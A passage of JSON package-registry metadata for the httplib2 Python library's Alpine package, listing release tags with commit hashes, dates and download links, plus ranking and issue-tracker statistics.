ners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0/manifests"},{"name":"v0.18.1","sha":"9bf300cdc372938f4237150d5b9b615879eb51a1","kind":"commit","published_at":"2020-05-20T19:56:40.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.1/manifests"},{"name":"v0.18.0","sha":"8373177d3a9e4dd9c956f9bded22a5f96a00957b","kind":"commit","published_at":"2020-05-20T12:55:27.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.18.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.18.0/manifests"},{"name":"v0.17.4","sha":"9413ffc973a2dc90abf787509ee82238345d5602","kind":"commit","published_at":"2020-05-19T14:28:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.4/manifests"},{"name":"v0.17.3","sha":"f5684876ef5e3b57c81f716c08b316fa36684f08","kind":"commit","published_at":"2020-04-22T09:09:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.3/manifests"},{"name":"v0.17.2","sha":"067b3f250769e921dc397e28f3aadd0ffa14e17b","kind":"tag","published_at":"2020-04-10T23:24:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.2/manifests"},{"name":"v0.17.1","sha":"0d490f692ca5f73cd2caaf9cc5e42e9f7702e453","kind":"tag","published_at":"2020-04-02T18:21:23.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.1/manifests"},{"name":"v0.17.0","sha":"67463426cf79af766176b1f318fefefd3d5edc23","kind":"tag","published_at":"2020-01-24T14:12:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.17.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"a128b94898068fb9357bb693f134c5d0a2443871","kind":"tag","published_at":"2020-01-15T22:54:53.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.16.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"095494db43abe8ddfd53b3c389baaadbfcae4f12","kind":"tag","published_at":"2019-12-19T14:34:09.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.15.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"761558788d540b9442cd1614570074c61aa0bfca","kind":"tag","published_at":"2019-09-27T04:44:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.14.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.14.0/manifests"},{"name":"v0.13.1","sha":"d498ee35017a9498cff3e9aa9887b95b988e6ca9","kind":"tag","published_at":"2019-07-28T11:28:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.1/manifests"},{"name":"v0.13.0","sha":"e92155b85c719405fefe69b045f3bcf55d4fbcc1","kind":"commit","published_at":"2019-06-06T19:40:38.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.13.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.13.0/manifests"},{"name":"v0.12.3","sha":"dd741d17b595ef47a12f06f7db823fb85edab603","kind":"commit","published_at":"2019-04-24T05:30:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.3/manifests"},{"name":"v0.12.1","sha":"ead7f8038f1cd02a923544c4f3294c1389ad3e03","kind":"commit","published_at":"2019-02-14T16:38:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.1/manifests"},{"name":"v0.12.0","sha":"86c3b4ea8614cbbddd86fc556781f2f79cd7c2ac","kind":"commit","published_at":"2018-11-14T04:40:05.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.12.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.12.0/manifests"},{"name":"v0.11.3","sha":"70fb0c820d2e8211992b402d34444e4b32a1cb6e","kind":"commit","published_at":"2018-03-30T02:21:39.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.3/manifests"},{"name":"v0.11.2","sha":"470bb2a9db658b7f851522051f2b0201a21e8925","kind":"commit","published_at":"2018-03-30T02:09:45.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.2/manifests"},{"name":"v0.11.1","sha":"f20cd36c44b75d9206f050304937d5f4d63f5b7a","kind":"commit","published_at":"2018-03-26T17:15:07.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.1/manifests"},{"name":"v0.11.0","sha":"5dee729d87cecab1b6c0d7874a8bbd8d24452849","kind":"commit","published_at":"2018-03-21T18:13:04.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.11.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.11.0/manifests"},{"name":"v0.10.3","sha":"1ae16e0e8e868e4b81225631ee37c6555493014b","kind":"commit","published_at":"2017-02-06T17:56:20.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"ef81f9566ee765b8f3d93429e3dfa17341d098e7","kind":"commit","published_at":"2017-02-03T21:09:28.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"4623377a073e1027a691fe139ba1e851eabf0d49","kind":"commit","published_at":"2017-02-03T19:43:17.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.10.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.10.1/manifests"},{"name":"0.9.2","sha":"cf631a73e2f3f43897b65206127ced82382d35f5","kind":"tag","published_at":"2015-09-28T13:53:22.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.2/manifests"},{"name":"0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"tag","published_at":"2015-09-28T13:52:59.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9.1/manifests"},{"name":"v0.9.1","sha":"f9f797223d075874b0031aea832152688ec23fef","kind":"commit","published_at":"2015-04-11T13:50:15.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-22T23:56:08.400Z","dependent_packages_count":7,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":5.106532840288783,"stargazers_count":8.745671186241708,"forks_count":5.458707518929389,"average":4.82772788636497},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.16","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T12:38:31.362Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.